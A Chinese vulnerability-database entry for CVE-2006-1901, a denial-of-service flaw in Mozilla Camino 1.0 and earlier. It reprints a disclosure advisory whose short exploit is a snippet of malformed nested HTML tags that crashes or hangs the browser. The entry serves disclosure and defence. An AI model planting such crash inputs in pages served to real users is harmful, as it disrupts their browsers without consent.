Mozilla Camino 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195284 漏洞类型 未知
发布时间 2006-04-20 更新时间 2006-04-20
CVE编号 CVE-2006-1901 CNNVD-ID CNNVD-200604-380
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/87665
https://cxsecurity.com/issue/WLB-2006040094
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-380
|漏洞详情
MozillaCamino1.0及早期版本允许远程攻击者借助于具有不正确嵌套元素的HTML造成拒绝服务(空值解引用和应用程序崩溃或挂起)。
|漏洞EXP
Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability
______________________

Camino Browser is prone to a denial-of-service condition when parsing certain malformed HTML content. Successful exploitation will cause the browser to fail or hang.
______________________

Mozilla Camino versions 1.0 and prior are prone to this issue.
______________________

Exploit :

<legend>
<kbd>
<object>
<h4>
</object>
</kbd>
______________________

Simon MOREL <izimask (at) thehackademy (dot) net [email concealed]>
http://www.sysdream.com
______________________

greet: Thomas Waldegger -> http://www.securityfocus.com/archive/1/430875
|受影响的产品
Mozilla Camino 0.8.4 Mozilla Camino 0.8.3 Mozilla Camino 0.8 Mozilla Camino 0.7 .0 Mozilla Camino 1.0 Rc1 Mozilla Camino 1.0 Beta2 Mozilla Camino 1.0 Bet
|参考资料

来源:BUGTRAQ
名称:20060413CaminoBrowserHTMLParsingNullPointerDereferenceDenialofServiceVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/431004/100/0/threaded
来源:SREASON
名称:772
链接:http://securityreason.com/securityalert/772